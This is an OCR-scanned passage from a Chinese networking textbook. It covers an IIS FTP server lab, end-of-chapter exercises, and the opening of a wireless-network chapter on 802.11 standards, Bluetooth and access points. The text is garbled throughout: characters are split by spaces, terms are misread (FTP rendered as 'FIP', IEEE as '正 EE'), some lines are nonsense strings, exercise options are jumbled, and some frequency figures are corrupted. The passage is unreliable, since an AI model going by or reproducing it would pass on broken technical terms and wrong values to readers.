(3) 禁用 匿名 身份 验证 ， 如 图 8-55 所 示 。 
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图 8-55 “匿名 身份 验证 ”禁用 设置 
(4) 客户 再 使 用 已 知 的 用 户 名 和 密码 访问 该 站 点 。 
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实 训 二 ”FTP 服务 器 的 安全 架设 


1. 实 训 目 的 
了 解 常用 的 网 络 应 用 服务 的 种 类 ， 掌 握 IIS 信息 服务 中 的 FTP 服务 器 的 安全 架设 。 
2. 实 训 内 容 


在 计算 机 上 利用 HS 创建 一 个 FIP 站 点 。 其 中 ， 站 点 名 称 为 “test02 ”使 用 
“Cxinetpubvftproot ”文件 夹 作为 该 站 点 的 主 目录 、 身份 验证 为 基本 用 户 , 授权 为 所 有 用 户 ， 
权限 设置 为 “ 读 取 ” 和 “ 写 入 ”。 


3. 实 训 步 又 
(1) 添加 FTP 角色 服务 ， 如 图 8-56 所 示 。 单 击 “ 下 一 步 ”按钮 ， 确 认 安 装 。 


图 8-56 添加 FTP 服务 器 
(2) 显示 安装 完成 界面 ， 单 击 “ 关 闭 ” 按 钮 ， 如 图 8-57 所 示 。 
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8-57 FTP 服务 器 安装 成 功 
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(3) 配置 默认 FTP 站 点 。 
Q@ 打开 IIs 管理 器 ， 双 击 “ 管 理 服务 ”选项 ， 如 图 8-58 所 示 。 
信息 服务 CTS) 管理 器 L 
本 YA — 
文件 0) ”视图 W) 帮助 00 
Ca @ R710-4 主页 LE ,== 
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TY 5 | pe 
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昌 可 站 | 
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5 
a | 
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图 8-58 在 IIS 中 选择 管理 服务 


@ 选中 “Windows 凭据 或 IS 管理 器 凭据 ”， 最 后 选项 右边 操作 列表 下 的 “应 用 ” 
选项 ， 如 图 8-59 所 示 。 

@ 使 用 “HIS 管理 器 用 户 ” 创 建 一 个 IS 所 管理 的 用 户 账号 。 为 此 ， 双 击 “IIS 管理 
器 用 户 ”， 选 择 “ 添 加 用 户 ” 选 项 ， 在 弹出 的 窗 体 中 输入 用 户 名 和 密码 ， 如 图 8-60 和 
图 8-61 所 示 。 
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8-59 设置 管理 服务 
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图 8-61 添加 用 户 


@ 创建 一 个 FTP 的 默认 目录 ,注意 请 添加 NETWORK SERVICE 有 完全 控制 的 权限 ， 
如 图 8-62 所 示 。 


8-62 设 定 NETWORK SERVICE 权限 


图 8-63 选择 “添加 FTP 站点” 


为 其 启用 IisManagerAuth， 并 创建 一 个 IIS 管理 凭据 的 账户 ， 使 其 具备 FTP 相应 
的 访问 权限 。 过 程 如 图 8-64 一 图 8-71 所 示 。 


图 8-66 设置 身份 验证 和 授权 图 8-67 选择 “ 自 定义 提供 程序 ”选项 
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4. 
一 个 网 页 ， 那 么 需要 为 这 个 网 站 设置 一 个 默认 网 页 ， 这 个 网 页 往往 被 称 为 (。 )。 


如 果 和 希望 在 用 户 访问 网 站 时 ， 若 没有 指定 具体 的 网 页 文档 名 称 时 ， 也 能 为 其 提供 


图 8-70 选择 “添加 允许 规则 ”选项 图 8-71 设置 允许 授权 规则 
FTP 建立 完成 ， 可 以 使 用 已 知 的 用 户 名 和 密码 登录 。 在 此 基础 上 再 新 建文 件 夹 ， 并 且 
给 每 个 文件 夹 赋予 权限 。 
本 章 习 题 
一 、 选 择 题 
加 1. 目前 建立 Web 服务 器 的 方法 主要 有 ( 。 )。 
A.IS B. URL C.SMTP D. DNS 
党 2。 用 户 将 文件 从 FTP 服务 器 复制 到 自己 计算 机 的 过 程 ， 称 为 ( 。 )。 
A. 上 传 B. 下 载 C. 共享 D. 打印 
3. ( ”) 的 FIP 服务 器 不 要 求 用 户 在 访问 它们 时 提供 用 户 账户 和 密码 。 
材 4 B. 独立 C. 共享 D. 专用 
列 


6. 


5. 


A. 链接 B. 首页 C. 映射 D. 文档 
( ” ) 协 议 用 于 发 送 电 子 邮 件 。 
A. HTTP B. POP3 C.SMTP D.FTP 


用 户 在 访问 Web 资源 时 需要 使 用 统一 的 格式 进行 访问 ， 这 种 格式 被 称 为 (  )。 
A. 物理 地 址 B. 耳 地址 C. 邮箱 地 址 D. 统一 资源 定位 符 
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7. 流 媒体 技术 主要 用 于 : ( )、 现 场 点 播 和 视频 会 议 。 
A. 远程 教育 B. 名 称 解析 C. 路 由 D. 邮件 传输 
8. ”Internet 是 世界 上 最 大 、 履 盖 范 围 最 广 的 计算 机 网 络 ， 它 采用 (  ”) 协 议 ， 将 全 世 
界 不 同 国家 、 不 同 地 区 、 不 同 部 门 和 不 同 结构 的 计算 机 、 国 家 骨干 网 、 广 域 网 、 局 域 网 ， 
通过 网 络 互联 设备 连接 在 一 起 。 


A. TCP/IP B. AppleTalk C. NetBEUI D. IPX/SPX 
9. 在 FIP 服 务 器 上 建立 (  )， 向 用 户 提 供 可 以 下 载 的 资源 。 

A. DHCP 中 继 代 理 B. 作用 域 

C.FTP 站 点 D. 主要 区 域 


10. 对 于 一 个 网 站 而 言 ， 可 以 把 所 有 网 页 及 相关 文件 都 存放 在 网 站 的 主 目录 中 ， 也 就 
是 在 主 目录 中 建立 子 文件 夹 ， 然 后 把 文件 放置 在 这 些 子 文件 夹 内 ， 这 些 文件 天 被 称 为 
( ). 


A. 实际 目录 B. 虚拟 目录 C. URL D. SMTP 
11. 用 户 将 自己 计算 机 的 文件 资源 复制 到 FTP 服务 器 上 的 过 程 ， 称 为 (。 )。 
A. 上 传 B. 下 载 C. 共享 D. 打印 


12. 每 一 个 使 用 电子 邮件 系统 的 用 户 都 需要 有 属于 自己 的 (  )， 它 代表 了 电子 邮箱 


A. 物理 地 址 B. 卫 地 址 
C. 电子 邮件 地 址 D. 统一 资源 定位 符 
13. 仅 为 特定 用 户 提供 资源 的 FTP 服务 器 被 称 为 “( ”)FTP 服务 器 ”， 用 户 要 想 成 
为 它 的 合法 用 户 ， 必 须 经 过 该 服务 器 管理 员 的 允许 ， 由 管理 员 为 用 户 分 配 一 个 用 户 账户 和 
密码 ， 然 后 用 户 使 用 这 个 用 户 账户 和 密码 访问 服务 器 ， 否 则 将 无 法 访问 。 


A. 匿名 B. 独立 C. 共享 D. 专用 
14. ( ”) 协 议 用 于 接收 电子 邮件 。 
A. HTTP B. POP3 C. SMTP D.FTP 
15. 用 户 在 FTP 客户 机 上 可 以 使 用 (  ) 下 载 FTP 站 点 上 的 内 容 。 
A. UNC 路 径 B. 浏览 器 C. 网 上 邻居 D. 网 络 驱动 器 
16. 搭建 邮件 服务 器 的 方法 有 : (  )、Exchange Server、Winmail 等 。 
A.IS B. URL C.SMTP D.DNS 


17. FTP 服务 实际 上 就 是 将 各 种 类 型 的 文件 资源 存放 在 ( 。”) 服 务 器 中 ,用 户 计算 机 上 
需要 安装 一 个 FTP 客户 端的 程序 ， 通 过 这 个 程序 实现 对 文件 资源 的 访问 。 


A. HTTP B. POP3 C.SMTP D.FTP 
18. 建立 FTP 服务 器 的 主要 方法 有 : IS 和 ( )。 

A.DNS B. RealMedia C. Serv-U D. SMTP 
二 、 填 空 题 
1. WWW 服务 主要 通过 协议 向 用 户 提供 网 页 信息 。 


2.” 默认 时 ，FTP 服务 所 使 用 的 TCP 端口 为 
3. ”如 果 一 个 Web 网 站 所 使 用 的 瑟 地 址 为 : 192.168.0.200，TCP 端口 号 为 : 4040， 则 
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用 户 应 该 在 Web 浏览 器 的 地 址 栏 中 输入 以 访问 这 个 Web 网 站 。 

4. ”在 创建 Web 网 站 时 , 需要 为 其 设 定 一 个 目录 ， 默认 时 网 站 中 的 所 有 资源 
都 存放 在 这 个 目录 中 。 

5. 利用 协议 ,用户 可 以 将 远程 计算 机 上 的 文件 下 载 到 自己 计算 机 的 磁盘 中 ， 
也 可 以 将 自己 的 文件 上 传 到 远程 计算 机 上 。 

6. 在 一 台 计 算 机 上 建立 多 个 Web 站 点 的 方法 有 : 利用 多 个 
端口 和 利用 多 个 主机 头 名 称 。 

7. 用 户 使 用 协议 从 电子 邮件 服务 器 那里 获取 电子 邮件 。 

8. 在 配置 FIP 站 点 时 ， 为 了 使 用 户 可 以 通过 完全 合格 域名 访问 站 点 ， 应 该 在 网 络 中 
配置 服务 器 。 

9. 目前 ， 应 用 于 互联 网 上 的 流 媒体 发 布 方式 主要 有 : 单 播 、 广 播 、 播 和 点 
播 等 四 种 方式 。 

10. 为 了 便于 对 站 点 资源 进行 灵活 管理 ， 还 可 以 把 文件 存放 在 本 地 计算 机 的 其 他 文件 
夹 中 或 者 其 他 计算 机 的 共享 文件 夹 中 ， 然 后 再 把 这 个 文件 夹 映 射 到 站 点 主 目录 中 的 一 个 


、 利 用 多 个 TCP 


EE 二 

三 、 判 断 题 
1. ”Internet 提供 的 主要 信息 服务 有 : WWW 服务 、FTP 服务 、E-mail 服务 、Telnet 服 
务 、 信 息 讨 论 与 公布 服务 、 娱 乐 与 会 话 服务 等 。 Co 
2. 默认 时 ，Web 网 站 不 允许 任何 人 P 地 址 的 计算 机 来 访问 它 。 ) 
3. ”FTP 服务 只 能 使 用 TCP 端口 21。 ) 
4. 管理 员 可 以 设置 让 FTP 站 点 允许 或 拒绝 某 台 Rs 问 该 
FTP 站 点 中 的 文件 。 《了 


5. 一 个 URL 的 格式 为 : “信息 服务 类 型 : // 信 息 资源 地 址 /文件 路 径 ”。 二 
6. Web 网 站 中 的 所 有 资源 都 必须 存储 在 主 目录 中 ， 用 户 无 法 访问 位 于 主 目录 之 外 的 


网 页 资源 。 , 
7. 在 FTP 服 务 器 上 可 以 建立 多 个 FIP 站 点 ,向 不 同 的 用 户 分 别提 供 可 以 下 载 的 资源 。 
C0 

8. 使 用 IIS 可 以 搭建 代理 服务 器 。 ,0 


9. Intemet 是 世界 上 最 大 、 覆盖 范围 最 广 的 计算 机 网 络 。 它 采用 IPX/SPX 协议 , 将 全 
世界 不 同 国家 、 不 同 地 区 、 不 同 部 门 和 不 同 结构 的 计算 机 、 国 家 骨干 网 、 广 域 网 、 局 域 网 ， 
通过 网 络 互 联 设备 连接 在 一 起 。 Ke 
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【本 章 要 点 】 

本 章 通过 对 与 无 线 网 络 相关 的 安全 技术 进行 详细 的 介绍 ， 使 学 生 对 无 线 网 络 安全 有 一 
个 较 全 面 的 认识 。 通 过 本 章 的 学 习 ， 学 生 可 以 掌握 无 线 网 络 的 基础 知识 ， 了 解 无 线 网 络 常 
见 的 安全 问题 ， 掌 握 WEP 技术 在 无 线 网 络 的 应 用 及 无 线 VPN 的 配置 。 


9.1 无 线 网 络 技术 概述 


所 谓 的 无 线 网 络 (Wireless LAN/WLAN)， 是 指 用 户 以 计算 机 通过 区 域 空间 的 无 线 网 卡 
(Wireless Card/PCMCIA 卡 ， 结 合 存 取 桥接 器 (Access Poinb 进 行 区 域 无 线 网 络 连接 ， 再 加 上 
一 组 无 线 上 网 拨 接 账 号 ， 即 可 上 网 进行 网 络 资源 的 利用 。 

简单 地 说 ， 无 线 局 域 网 与 一 般 传统 的 以 太 网 络 (Ethemeb 的 概念 并 没有 多 大 的 差异 ， 只 
是 无 线 局 域 网 将 用 户 端 接 取 网 络 的 线路 传输 部 分 转变 成 无 线 传输 的 形式 ， 但 是 却 具 备 有 线 
网 络 缺 乏 的 行动 性 ， 然 而 之 所 以 称 其 是 局 域 网 ， 则 是 因为 会 受到 桥接 器 与 计算 机 之 间距 离 
的 远近 限制 而 影响 传输 范围 ， 所 以 必须 要 在 区 域 范围 内 才 可 以 连 上 网 络 。 


9.1.1 无 线 局 域 网 的 优势 


若 与 有 线 网 络 比较 的 话 ， 无 线 局 域 网 的 速度 还 是 慢 了 许多 ， 但 无 线 具 有 较为 便利 性 等 
优点 ， 所 以 还 是 会 吸引 到 许多 企业 与 家 庭 用 户 的 使 用 ， 整 体 来 看 ， 无 线 局 域 网 包括 下 列 几 
点 优势 。 

(1) 无 线 局 域 网 不 再 受 限 于 网 络 可 连 线 端点 数 的 多 寡 ， 就 可 轻松 地 在 无 线 局 域 网 中 增 
加 新 的 使 用 者 数目 。 

(2) 使 用 无 线 局 域 网 时 不 必 受 限于 网 络 线 的 长 短 与 插 槽 ， 节 省 有 线 网 络 布线 的 人 力 与 
物力 成 本 ， 从 此 捍 脱 被 网 络 线 纠缠 的 梦 寿 。 

(G3) 较 时 下 流行 的 GPRS 手机 与 CDMA 手机 ， 无 线 局 域 网 具有 高 速 宽频 上 网 的 特性 ， 
它 可 提供 11Mb/s， 可 满足 使 用 者 对 大 量 的 图 像 、 影 音 传输 的 需求 。 

(4) 对 于 上 班 族 与 经 常 需要 离开 办 公 座 位 开会 的 主管 人 员 来 说 ， 使 用 无 线 局 域 网 就 可 
不 用 再 担心 找 不 到 上 网 的 插座 。 此 外 ， 透 过 无 线 局 域 网 ， 使 用 者 可 以 在 信号 涵盖 的 范围 内 ， 
用 笔记 本 电脑 等 设备 ， 可 以 随时 随地 的 与 网 络 保持 连接 。 

(5) 除了 “无 线 ” 可 以 免 去 实体 网 络 线 布 线 的 困扰 之 外 ， 另 外 ， 在 网 络 发 生 错 误 的 时 
候 ， 也 不 用 慢 慢 寻找 出 损坏 的 线路 ， 只 要 检查 信号 发 送 与 接收 端的 信号 是 否 正常 即 可 。 

由 于 无 线 局 域 网 具有 以 上 种 种 优点 ， 无 线 局 域 网 不 仅 可 以 成 为 有 线 局 域 网 的 再 延伸 
更 具有 相当 高 的 可 靠 性 。 在 不 久 的 将 来 ， 取 代 有 线 局 域 网 成 为 人 们 上 网 的 主要 方式 ， 改 变 
人 们 对 于 网 络 的 使 用 习惯 。 
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- 潮 洲 著 粮 半 过 潍 民 谷 寺 者 到 汝 也 
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9.1.2 无 线 局 域 网 规格 标准 


为 了 让 无 线 局 域 网 技术 能 够 被 广 为 使 用 ， 这 些 技术 必须 要 建立 一 种 业界 标准 ， 以 确保 
各 厂商 生产 的 设备 都 能 具有 相 容 性 与 稳定 性 。 这 些 标准 是 由 美国 正 EE( 电 机 电子 工程 师 协 
会 ，The Institute of Electrical and Electronics Engineers) 所 制定 的 ，1990 年 IEEE802 标准 化 
委员 会 成 立正 EE802.11WLAN 标准 工作 组 。 

1. IEEE802.11(Wi-Fi: WirelessFidelity， 无 线 保 真 ) 

1997 年 6 月， 大量 的 局 域 网 以 及 计算 机 专家 审定 通过 了 该 标准 ， 该 标准 定义 物理 层 和 
媒体 访问 控制 (MAC) 规 范 。 物 理 层 定义 了 数据 传输 的 信号 特征 和 调制 ， 定 义 了 两 个 RF 传 
输 方法 和 一 个 红外 线 传输 方法 ，RF 传输 标准 是 跳 频 扩 频 和 直接 序列 扩 频 ， 工 作 在 2.4000 一 
2.4835GHz 频段 。IEEE802.11 是 IEEE 最 初 制定 的 一 个 无 线 局 域 网 标准 ， 主 要 用 于 解决 办 
公 室 局 域 网 和 校园 网 中 用 户 与 用 户 终端 的 无 线 接 入 ， 业 务 主 要 限于 数据 访问 ， 速 率 最 高 只 
能 达到 2Mbps。 由 于 它 在 速率 和 传输 距离 上 都 不 能 满足 人 们 的 需要 ， 所 以 下 EE802.11 标准 
被 IEEE802.1lb 所 取代 了 。 


2. IEEE802.11b 


1999 年 9 月 下 EE802.11b 被 正式 批准 ， 该 标准 规定 WLAN 工作 频段 在 2.4 一 2.4835GHz， 
数据 传输 速率 达到 11Mbps， 传 输 距离 控制 在 30 一 150ft。 该 标准 是 对 IEEE802.11 的 一 个 补 
充 ， 采 用 补偿 编码 键 控 调 制 方式 ， 采 用 点 对 点 模式 和 基本 模式 两 种 运作 模式 ， 在 数据 传输 
速率 方面 可 以 根据 实际 情况 在 11Mbps、5.5Mbps、2Mbps、1Mbps 的 不 同 速率 间 自 动 切换 ， 
它 改 变 了 WLAN 设计 状况 ， 扩 大 了 WLAN 的 应 用 领域 。IEEE802.11b 已 成 为 当前 主流 的 
WLAN 标准 ， 被 多 数 厂 商 所 采用 ， 所 推出 的 产品 广泛 应 用 于 办 公 室 、 家 庭 、 宾 馆 、 车 站 、 
机 场 等 众多 场合 ， 但 是 由 于 许多 WLAN 的 新 标准 的 出 现 ，IEEE802.11a 和 IEEE802.11g 更 
是 备 受 业界 关注 。 


3. IEEE802.11a 


1999 年 , IEEE802.11a 标准 制定 完成 , 该 标准 规定 WLAN 工作 频段 在 $.15 一 5.825GHz， 
数据 传输 速率 达到 54Mbps/72Mbps(Turbo)， 传 输 距离 控制 在 10 一 100m。 该 标准 也 是 
IEEE802.11 的 一 个 补充 ， 扩 充 了 标准 的 物理 层 ， 采 用 正 交 频 分 复 用 (OFDM) 的 独特 扩 频 技 
术 ， 采 用 QFSK 调制 方式 ， 可 提供 25Mbps 的 无 线 ATM 接口 和 10Mbps 的 以 太 网 无 线 帧 结 
构 接 口 ， 支 持 多 种 业务 如 话音 、 数 据 和 图 像 等 ， 一 个 扇 区 可 以 接 入 多 个 用 户 ， 每 个 用 户 可 
带 多 个 用 户 终 端 。IEEE802.11a 标准 是 IEEE802.11b 的 后 续 标准 ， 其 设计 初 更 是 取代 
802.11b 标准 ， 然 而 ， 工 作 于 2.4GHz 频带 是 不 需要 执照 的 ， 该 频段 属于 工业 、 教 育 、 医 疗 
等 专用 频段 ， 是 公开 的 ， 工 作 于 5.15 一 8.825GHz 频带 需要 执照 的 。 一 些 公 司 仍 没有 表示 对 
802.11a 标准 的 支持 ， 一 些 公司 更 加 看 好 最 新 混合 标准 一 一 802.11g。 

4. IEEE802.11g 


目前 ，IEEE 推出 最 新 版 本 下 EE802.11g 认证 标准 ， 该 标准 提出 拥有 IEEE802.11a 的 传 
输 速 率 ， 安 全 性 较 IEEE802.1lb 好 ， 采 用 两 种 调制 方式 ， 含 802.11a 中 采用 的 OFDM 与 
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IEEE802.1lb 中 采用 的 CCK, 做 到 与 802.11a 和 802.11b 兼容 。 虽然 802.11a 较 适 用 于 企业 ， 
但 WLAN 运营 商 为 了 兼顾 现 有 802.11b 设备 投资 ， 选 用 802.11g 的 可 能 性 极 大 。 


5. IEEE802.11i 


IEEE802.11i 标准 是 结合 IEEE802.1x 中 的 用 户 端口 身份 验证 和 设备 验证 ， 对 WLAN 
MAC 层 进行 修改 与 整合 ， 定 义 了 严格 的 加 密 格 式 和 鉴 权 机 制 ， 以 改善 WLAN 的 安全 性 。 
IEEE802.11i 新 修订 标准 主要 包括 两 项 内 容 : “Wi-Fi 保护 访问 ”(Wi-FiProtectedAccess: 
WPA) 技 术 和 “强健 安全 网 络 ”(RSN)。Wi-Fi 联盟 计划 采用 802.11i 标准 作为 WPA 的 第 二 
个 版 本 ， 并 于 2004 年 年 初 开始 实行 。IEEE802.11i 标准 在 WLAN 网 络 建设 中 的 是 相当 重要 
的 ， 数 据 的 安全 性 是 WLAN 设备 制造 商 和 WLAN 网 络 运营 商 应 该 首先 考虑 的 头等 工作 。 


6. 其 他 IEEE802.11e 标准 


IEEE802.11e 标准 对 WLAN MAC 层 协议 提出 改进 ， 以 支持 多 媒体 传输 ， 以 支持 所 有 
WLAN 无 线 广播 接口 的 服务 质量 保证 Qos 机 制 。IEEE802.11f， 定 义 访问 节点 之 间 的 通信 ， 
支持 下 EE802.11 的 接 入 点 互 操 作协 议 (IAPP)。IEEE802.11h 用 于 IEEE802.11a 的 频谱 管理 
技术 。2013 年 9 月 12 日 ,工信部 电信 研究 院 标准 所 所 长 王 志 勤 在 “2013 年 中 国 无 线 技术 
与 应 用 大 会 ”上 宣布 : IEEE802.11ah 已 进入 标准 草案 制定 阶段 ， 预 计 正式 标准 将 于 2016 
年 发 布 。 据 介绍 ，2010 年 ，IEEE 启动 了 面向 物 联网 的 WLAN 技术 标准 制定 ， 即 
IEEE802.11ah， 使 用 1GHz 以 下 免 许可 频段 ， 具 有 覆盖 面 更 大 、 支 持 更 多 用 户 、 更 低 功 耗 、 
针对 中 低速 率 进行 优化 增强 等 特点 。IEEE802.11ah 标准 预计 将 可 涵盖 一 般 10 一 20Mbps 的 
家 庭 应 用 ， 它 还 将 有 助 于 使 Wi-Fi 供 货 商 扩 展 至 支持 多 达 8 000 个 联网 的 大 型 建筑 物 网 络 。 


7. HiperLAN 规格 


相 较 于 IEEE802.11a， 发 展 较 晚 的 欧洲 标准 HyperLAN ， 是 由 欧洲 通信 标准 协会 
ETSI(The European Telecommunications Standards Institute) 在 BRAN(Broadband Radio Access 
Networks) 所 制定 的 ， 在 欧洲 设置 455MHz 的 频 宽 使 用 。 

HiperLAN 1 推出 时 ， 数 据 速率 较 低 ， 没 有 被 人 们 重视 ， 在 2000 年 ，HiperLAN 2 标准 
制定 完成 ,HiperLAN 2 标准 的 最 高 数据 速率 能 达到 54Mbit/s，HiperLAN 2 标准 详细 定义 了 
WLAN 的 检测 功能 和 转换 信 令 ， 用 以 支持 许多 无 线 网 络 ， 支 持 动态 频率 选择 、 无 线 信 元 转 
换 、 链 路 自 适应 、 多 束 天 线 和 功率 控制 等 。 该 标准 在 WLAN 性 能 、 安 全 性 、 服 务 质量 QOS 
等 方面 也 给 出 了 一 些 定 义 。HiperLAN1 对 应 IEEE802.11b，HiperLAN2 与 IEEE082.11a 具 
有 相同 的 物理 层 , 它们 可 以 采用 相同 的 部 件 , 并 且 , HiperLAN2 强调 与 3G 整合 。HiperLAN 
2 标准 也 是 目前 较 完 善 的 WLAN 协议 。 

8. 蓝牙 (Bluetooth) 技 术 


蓝牙 是 一 种 可 在 短 距离 之 内 ， 以 低 功率 及 低 成 本 传送 资料 的 无 线 传输 标准 ， 并 确保 不 
同 厂商 所 制造 的 设备 能 彼此 相互 沟通 使 用 ， 同 时 此 传输 介质 必须 能 兼 具 语音 及 数据 通信 
能 力 。 它 广泛 应 用 于 世界 各 地 ， 可 以 无 线 连接 手机 、 便 携 式 计算 机 、 汽 车 、 立 体 声 耳机 、 
MP3 播放 器 等 多 种 设备 。 


加 
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图 |- 一 一 一 济 洲 芝兰 半 ”车 溢 民 侣 睹 出 到 沼 卫 


相信 大 多 数 的 人 都 不 知道 ， 其 实 蓝牙 这 个 名 词 的 由 来 是 源 自 欧洲 中 世纪 一 位 名 叫 
Harald Bluetooth 丹麦 国王 的 名 字 ， 丹 麦 国 王 为 何 会 和 无 线 传输 技术 牵扯 上 关系 呢 ? 原因 是 
这 位 名 为 Harald Bluetooth 的 丹麦 国王 一 生 致力 于 协调 丹麦 与 挪威 之 间 的 纷争 , 最 后 统一 瑞 
典 、 芬 兰 、 丹 麦 ， 并 在 北欧 历史 上 留 下 不 朽 的 英名 。 人 们 就 将 新 一 代 的 无 线 传输 技术 命名 
为 “蓝牙 ”， 和 希望 能 够 透 过 蓝牙 的 技术 ， 将 每 个 厂商 所 生产 的 设备 都 用 统一 的 标准 将 各 项 
配备 相互 连接 。 

2009 年 4 月 21 日 ， 蓝 牙 技术 联盟 (Bluetooth SIG) 正 式 颁布 了 新 一 代 标 准 规范 
“Bluetooth Core Specification Version 3.0 High Speed”( 蓝 牙 核心 规范 3.0 版 )， 蓝 牙 3.0 的 
核心 是 “Generic Altermate MAC/PHY”(AMP)， 这 是 一 种 全 新 的 交替 射频 技术 ， 人 允许 蓝牙 
协议 栈 针对 任 一 任务 动态 地 选择 正确 射频 。 最 初 被 期 望 用 于 新 规范 的 技术 包括 IEEE 802.11 
以 及 UMB， 但 是 新 规范 中 取消 了 UMB 的 应 用 。 

作为 新 版 规范 , 蓝牙 3.0 的 传输 速度 自然 会 更 高 , 而 秘密 就 在 正 EE802.11 无 线 协议 上 。 
通过 集成 “IEEE802.11 PAL”( 协 议 适 应 层 )， 蓝 牙 3.0 的 数据 传输 率 提高 到 了 大 约 
24Mbps( 即 可 在 需要 的 时 候 调用 IEEE802.11 Wi-Fi 用 于 实现 高 速 数 据 传 输 )。 在 传输 速度 上 ， 
蓝牙 3.0 是 蓝牙 2.0 的 8 倍 ， 可 以 轻松 用 于 录像 机 至 高 清 电 视 、PC 至 PMP、UMPC 至 打印 
机 之 间 的 资料 传输 。 

功 耗 方面 ， 通 过 蓝牙 3.0 高 速 传 送 大 量 数据 自然 会 消耗 更 多 能 量 ， 但 由 于 引入 了 增强 
电源 控制 (EPC) 机 制 ， 再 辅 以 了 EEE802.11， 实 际 空闲 功 耗 会 明显 降低 ， 蓝 牙 设 备 的 待机 耗 
电 问 题 有 望 得 到 初步 解决 。 事 实 上 ， 蓝 牙 联 盟 也 正在 着 手 制 定 新 规范 的 低 功 耗 版 本 。 

此 外 ， 新 的 规范 还 具备 通用 测试 方法 (GTM) 和 单 向 广播 无 连接 数据 (UCD) 两 项 技术 ， 
并 且 包 括 了 一 组 HCI 指令 以 获取 密 钥 长 度 。 据 称 ， 配 备 了 蓝牙 2.1 模块 的 PC 理论 上 可 以 
通过 升级 固件 让 蓝牙 2.1 设备 也 支持 蓝牙 3.0。 

蓝牙 4.0 相 比 蓝牙 3.0 主要 有 三 个 方面 的 改进 : 电池 续航 时 间 、 节 能 和 设备 种 类 上 。 此 
外 ， 蓝 牙 4.0 的 有 效 传输 距离 也 有 所 提升 。3.0 版 本 的 蓝牙 的 有 效 传输 距离 为 10m( 约 32fbD， 
而 蓝牙 4.0 的 有 效 传输 距离 最 高 可 达到 100m( 约 328fb 。 

蓝牙 4.0 是 个 三 位 一 体 的 技术 ， 它 将 三 种 规格 合 而 为 一 ， 分 别 是 传统 蓝牙 、 低 功 耗 蓝 
牙 和 高 速 蓝牙 技术 , 这 三 个 规格 可 以 组 合 或 者 单独 使 用 。SIG 首席 技术 总 监 (CTO) 葛 立 表 示 ， 
全 新 的 蓝牙 4.0 版 本 涵盖 了 三 种 蓝牙 技术 ， 是 一 个 “三 融 技术 ”， 首 先 蓝牙 4.0 继承 了 蓝牙 
技术 无 线 连接 的 所 有 固有 优势 ， 同 时 增加 了 低 耗 能 蓝牙 和 高 速 蓝 牙 的 特点 ， 尤 以 低 耗 能 技 
术 为 核心 ， 大 大 拓展 了 蓝牙 技术 的 市 场 潜 力 。 低 耗 能 蓝牙 技术 将 为 以 纽扣 电池 供电 的 小 型 
无 线 产品 及 感 测 器 ， 进 一 步 开 拓 医 疗 保健 、 运 动 与 健身 、 保 安 及 家 庭 娱 乐 等 市 场 提供 新 的 
机 会 。 

目前 ， 蓝 牙 4.0 已 经 走向 了 商用 ， 在 最 新 款 的 galaxy S4，ipad 4、MacBook Air、 
Moto Droid Razr、HTC One X 以 及 台 商 ACER AS3951 系列 /Getway NV57 系列 ，ASUS 
UX21/31 系列 ，iPhone 5S 上 都 已 应 用 了 蓝牙 4.0 技术 。 虽 然 很 多 设备 已 经 使 用 上 蓝牙 4.0 
技术 ， 但 是 相应 的 蓝牙 耳机 却 没有 及 时 推出 ， 不 能 发 挥 蓝 牙 4.0 应 有 的 优势 。 不 过 这 个 局 
面 已 经 被 国内 蓝牙 领导 品牌 woowi( 吾 爱 ) 打 破 , 作为 积极 参与 蓝牙 4.0 规范 制定 和 修改 的 厂 
商 ，woowi 已 于 2012 年 6 月 率先 发 布 全 球 第 一 款 蓝 牙 4.0 耳机 一 一 woowi hero。 


JN 荔 9 彰 无 绪 克 络 安全 


9.1.3 ”无 线 网 络 设备 


1. 无 线 AP 


无 线 AP(AP，Access Point， 无 线 访问 节点 、 会 话 点 或 存 取 桥 接 器 ) 是 一 个 包含 很 广 的 
名 称 ， 它 不 仅 包含 单纯 性 无 线 接 入 点 (无 线 AP)， 也 同样 是 无 线 网 关 、 无 线 网 桥 等 类 设备 的 
统称 ， 如 图 9-1 所 示 。 


9-1 WAP54G 无 线 AP 


各 种 文章 或 厂家 在 面 对 无 线 AP 时 的 称呼 目前 比较 混乱 ， 但 随 着 无 线路 由 器 的 普及 ， 
目前 的 情况 下 如 没有 特别 的 说 明 ， 我 们 一 般 还 是 只 将 所 称呼 的 无 线 AP 理解 为 单纯 性 无 线 
AP， 以 示 和 无 线路 由 器 加 以 区 分 。 它 主要 是 提供 无 线 工作 站 对 有 线 局 域 网 和 从 有 线 局 域 网 
对 无 线 工 作 站 的 访问 , 在 访问 接 入 单 击 覆 盖 范 围 内 的 无 线 工 作 站 可 以 通过 它 进行 相互 通信 。 

单纯 性 无 线 AP 就 是 一 个 无 线 的 交换 机 ， 仅 仅 是 提供 一 个 无 线 信号 发 射 的 功能 。 单 纯 
性 无 线 AP 的 工作 原理 是 将 网 络 信 号 通过 双 绞 线 传送 过 来 , 经 过 AP 产品 的 编译 , 将 电信 号 
转换 成 为 无 线 电 信号 发 送出 来 ， 形 成 无 线 网 的 覆盖 。 根 据 不 同 的 功率 ， 其 可 以 实现 不 同 程 
度 、 不 同 范围 的 网 络 覆 盖 ， 一 般 无 线 AP 的 最 大 覆盖 距离 可 达 300m。 

多 数 单纯 性 无 线 AP 本 身 不 具备 路 由 功能 ， 包 括 DNS、DHCP、Firewall 在 内 的 服务 器 
功能 都 必须 有 独立 的 路 由 或 是 计算 机 来 完成 。 目 前 大 多 数 的 无 线 AP 都 支持 多 用 户 (30 一 100 
台 计算 机 ) 接 入 、 数 据 加 密 、 多 速率 发 送 等 功能 ， 在 家 庭 、 办 公 室内 ， 一 个 无 线 AP 便 可 实 
现 所 有 计算 机 的 无 线 接 入 。 

单纯 性 无 线 AP 亦 可 对 装 有 无 线 网 卡 的 计算 机 做 必要 的 控制 和 管理 。 单 纯 性 无 线 AP 既 
可 以 通过 10BASE-T(WAN) 端 口 与 内 置 路 由 功能 的 ADSL MODEM 或 CABLE MODEM(CM) 
直接 相连 ， 也 可 以 在 使 用 时 通过 交换 机 /集线器 、 宽 带路 由 器 再 接 入 有 线 网 络 。 

无 线 AP 跟 无 线路 由 器 类 似 ， 按 照 协 议 标 准 本 身 来 说 IEEE 802.11b 和 IEEE 802.11g 的 
覆盖 范围 是 室内 100m、 室 外 300m。 这 个 数值 仅 是 理论 值 ， 在 实际 应 用 中 ， 会 碰 到 各 种 障 
碍 物 ， 其 中 以 玻璃 、 木 板 、 石 膏 墙 对 无 线 信号 的 影响 最 小 ， 而 混凝土 墙壁 和 铁 对 无 线 信号 
